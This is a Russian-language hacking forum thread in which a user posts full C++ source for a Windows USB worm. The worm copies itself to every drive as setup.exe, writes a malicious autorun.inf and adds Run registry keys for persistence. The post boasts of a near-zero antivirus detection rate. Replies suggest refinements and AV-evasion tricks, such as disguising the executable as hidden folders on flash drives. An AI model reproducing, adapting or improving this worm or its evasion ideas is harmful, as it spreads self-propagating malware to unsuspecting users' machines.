[C++] USB червь

[IBM]

Код:

#include <windows.h>
#include "stdio.h"

HKEY key;
int count = 0;
char scount[3];

char selfPath[MAX_PATH]; 


void GetAll()
  {
    GetModuleFileName(0, selfPath, sizeof(selfPath));
  }
void InfectDisk(LPCTSTR autopath)
  {
    count++;
    char drive[3];
    char target[MAX_PATH];
    char name[24];
    _splitpath(autopath, drive, 0, 0, 0);
    FILE *file=fopen(autopath, "w");
    fprintf(file, "[autorun]\nOpen=setup.exe\n");
    fprintf(file, "icon=%%SystemRoot%%\\system32\\SHELL32.dll,4\n");
    fprintf(file, "action=Open folder to view files\n");
    fprintf(file, "shell\\open=Open\n");
    fprintf(file, "shell\\open\\command=setup.exe\n");
    fprintf(file, "shell\\open\\default=1\n");
    fclose(file);       
    strcpy(target, drive);
    strcat(target, "\\");
    strcat(target, "setup.exe");
    RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
    strcpy(name, "update_");
    itoa(count, scount, 10);
    strcat(name, scount);
    RegSetValueEx(key,name,0,REG_SZ,(BYTE *)target,sizeof(target));
    RegCloseKey(key); 
    CopyFile(selfPath, target, true); 
  }

int main()
  {
    GetAll();
    for(;;)
      {
        char buf[26];
        const char *inffile = "autorun.inf"; 
        char *sname;
        GetLogicalDriveStringsA(sizeof(buf), buf);
        for (char *s = buf; *s; s+=strlen(s)+1) 
          {
            strcpy(sname, s);
            strcat(sname, inffile);    
            InfectDisk(sname);
          }
        count = 0;
        Sleep(15000);
      }  
  }

И так, червь копируется на все диски каждые 15 секунд с именем setup.exe

Так же на каждом диске, каждые 15 секунд создает autorun.inf с содержимым:

Код:

[autorun]
Open=setup.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=setup.exe
shell\open\default=1

Автозапуск с помощью HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

Имя ключа update_%номер записи%
Значением является путь до каждой копии на зараженных дисках.

номер записи является от единицы и до количества зараженных дисков.

Детект:

Название файла: main.exe
Размер файла: 21090 байт
Дата сканирования: Mon, 27 Jan 14 13:44:54 -0500
MD5-хэш файла: f075167cbee9547e7f5a97c6480fe02c

Результат: 1 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: OK
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
Comodo: OK
Dr.Web: OK
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: Worm:Win32/Autorun.gen!BT
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru

Если ваш ник Mr.Burns:

Скрытый текст

Закрой вкладку и не ной.

[olegteror]

Цитата:

Сообщение от ;93930

Так же на каждом диске, каждые 15 секунд создает autorun.inf с содержимым:

Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.

[n00b]

Цитата:

Сообщение от olegteror

Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.

вово, + файл авторан только будет палить вирус перед АВерами...
Будет логичнее сделать так: все папки на флехе сделать скрытыми, скопировать .exe с таким количеством сколько папок и с такими же именами, иконка - как у папки. После открытия .exe она открывает папку к которой обращались. Если антивирус молчит, то ты хуй догадаешься что флеха заражена

[IBM]

Цитата:

Сообщение от olegteror

Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.

Ну что бы сделать такую проверку, то нужно еще и содержимое проверять или md5 сумму, ибо на каждой второй флешке есть этот ваш autorun.inf, за тем и перезаписываем их каждые 15 минут, что бы действий меньше.

Цитата:

Сообщение от n00b

вово, + файл авторан только будет палить вирус перед АВерами...
Будет логичнее сделать так: все папки на флехе сделать скрытыми, скопировать .exe с таким количеством сколько папок и с такими же именами, иконка - как у папки. После открытия .exe она открывает папку к которой обращались. Если антивирус молчит, то ты хуй догадаешься что флеха заражена

Раз такой умный возьми и сделай

[Mr.Burns]

Цитата:

Сообщение от Nu11ers3t

strcpy(target, drive);
strcat(target, "\\");
strcat(target, "setup.exe");

Код:

wsprintf(target, "%s\\%s", drive, "setup.exe");

Код:

wsprintf(target, "%s\\setup.exe", drive);

[n00b]

что все на советы так хреново откликаются? я уж молчу про критику

[denant]

Цитата:

Сообщение от olegteror

Вопрос.а НАХУЯ? если можно 1 раз создать и проверять присутствие сие.

Тебе жалко жесткий жертвы? А так автор прав, для проверки на то, что это твои файлы, придется добавлять лишний код